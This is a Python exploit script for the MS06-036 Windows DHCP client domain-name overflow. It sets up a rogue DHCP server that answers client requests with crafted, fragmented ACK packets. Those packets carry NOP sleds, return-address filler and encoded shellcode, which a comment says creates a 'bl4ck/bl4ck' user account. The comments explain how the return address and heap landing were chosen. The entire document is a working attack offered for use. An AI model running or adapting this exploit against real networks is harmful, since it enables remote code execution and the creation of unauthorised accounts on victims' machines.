#!/usr/bin/env python # # # by redsand@blacksecurity.org # this (like any thing) would not be possible w/out the bl4ck team. # thanks guys. # import sys, os sys.path.append("pydhcplib") from scapy import * from pydhcplib.dhcp_packet import * from pydhcplib.dhcp_network import * from pydhcplib.type_strlist import * from pydhcplib.type_ipv4 import * from pydhcplib.type_hw_addr import * inet_face = "vmnet8" default_ip = "10.31.33.7" # user bl4ck/bl4ck # this exits via Thread (so thta we kill the dhcp thread in services.exe # # this means if services doesn't crash, it was a successful exploit # scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \ "\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \ "\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \ "\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \ "\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \ "\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \ "\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \ "\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \ "\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \ "\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \ "\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \ "\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \ "\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \ "\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \ "\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5" netopt = {'client_listen_port':"68", 'server_listen_port':"67", 'listen_address':"0.0.0.0"} def substr(i,o,off): begin=i[:off] end=i[off+len(o):] ret=begin+o+end return ret def io(i): str="" a=chr(i % 256) i=i >> 8 b=chr(i % 256) i=i >> 8 c=chr(i % 256) i=i >> 8 d=chr(i % 256) str+="%c%c%c%c" % (a,b,c,d) return str class Server(DhcpServer): def __init__(self, options): DhcpServer.__init__(self,options["listen_address"], options["client_listen_port"], options["server_listen_port"]) def HandleDhcpDiscover(self, packet): my_reqip = '' my_reqip = default_ip sid_i = my_reqip.rfind(".") server_ip = my_reqip[0:sid_i] + ".254" our_ip = my_reqip[0:sid_i] + ".2" mymac = hwmac(packet.GetHardwareAddress()).str() print "** Received discover from %s (%s)" % (mymac,my_reqip) mpacket = DhcpPacket() mpacket.CreateDhcpOfferPacketFrom(packet) mpacket.SetOption("dhcp_message_type",[2]) mpacket.SetOption("yiaddr", ipv4(my_reqip).list()) mpacket.SetOption("siaddr", ipv4(server_ip).list()) mpacket.SetOption("ip_address_lease_time",[0,0,7,8]) mpacket.SetOption("flags",[0,0]) mpacket.SetOption("server_identifier", ipv4(server_ip).list()) mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list()) mpacket.SetOption("domain_name_server", ipv4(our_ip).list()) mpacket.SetOption("router",ipv4(our_ip).list()) mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list()) append = "\xfa\xff" + ( "\x90" * 0xff ) append = "\xfa\xff" + ( "\x90" * 0xff ) append = "\xfa\xff" + ( "\x90" * 0xff ) append = "\xfa\xff" + ( "\x90" * 0xff ) append = "\xfa\xff" + ( "\x90" * 0xff ) p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('') print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip) sendp(p, iface=inet_face, verbose=False) def HandleDhcpRequest(self, packet): ip = packet.GetOption("request_ip_address") sid = packet.GetOption("server_identifier") ciaddr = packet.GetOption("ciaddr") my_reqip = '' try: data = packet.options_data['request_ip_address'] for i in range(0,len(data),4) : if len(data[i:i+4]) == 4 : my_reqip += ipv4(data[i:i+4]).str() except: my_reqip = default_ip mymac = hwmac(packet.GetHardwareAddress()).str() print "** Received request from %s (%s)" % (my_reqip,mymac) sid_i = my_reqip.rfind(".") server_ip = my_reqip[0:sid_i] + ".254" our_ip = my_reqip[0:sid_i] + ".2" mypacket = DhcpPacket() mypacket.CreateDhcpAckPacketFrom(packet) mypacket.SetOption("yiaddr", ipv4(my_reqip).list()) dumbstr = "\x90" * 0xFF # we're looking for a jmp/call ebx ?! or landing in our codespace # directly # C5 converts to 253C # BB = 2557 # AA = 00AC # DD = 258C # EE = 03B5 # 88 = 00D6 # 99 = 00EA # F3 = 2591 # B0 = 2264 # 8F = 00c5 eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64" #eipstr = "C" * 0xFF payload = "\x42" * 0xFF payload = substr(payload, scode, 1) ## find location in heap to ret2 # find offset & append as many "\x26\x6e\x43\x6e" # to increment ebx to a non trashed location (since ebx points to our code) # then push ebx \x53 and \xc4 (retn) # # we're looking for a pop+pop+ret or a jmp/call ebx to return to our # unicode filtered input # note it must be iwthin the bounds of 0x0000**** - 0x0070**** # or 0x22***** <-- wont help us append = "\x0f\xff" + ( "\x90" * 0xff ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( eipstr ) append += "\xfa\xff" + ( eipstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( dumbstr ) append += "\xfa\xff" + ( payload[0:254]) + "\x00" print "Length of our attack: %r" % len(append) eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face)) p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024) print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip) for i in p: sendp(eth/i, iface=inet_face, verbose=False) def HandleDhcpDecline(self, packet): return #print "** Dhcp Declined" #packet.PrintHeaders() #packet.PrintOptions() def HandleDhcpRelease(self, packet): return #packet.PrintHeaders() #packet.PrintOptions() def HandleDhcpInform(self, packet): return #packet.PrintHeaders() #packet.PrintOptions() print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow" print "\t by redsand@blacksecurity.org" print "Usage: %s [interface] [forced request ip]" % sys.argv[0] print "" if len(sys.argv) > 1: inet_face = sys.argv[1] if len(sys.argv) > 2: default_ip = sys.argv[2] print "Listening for client requests:\n" print "Listening on interface: %s" % inet_face print "Using default address: %s" % default_ip server = Server(netopt) while True : server.GetNextDhcpPacket()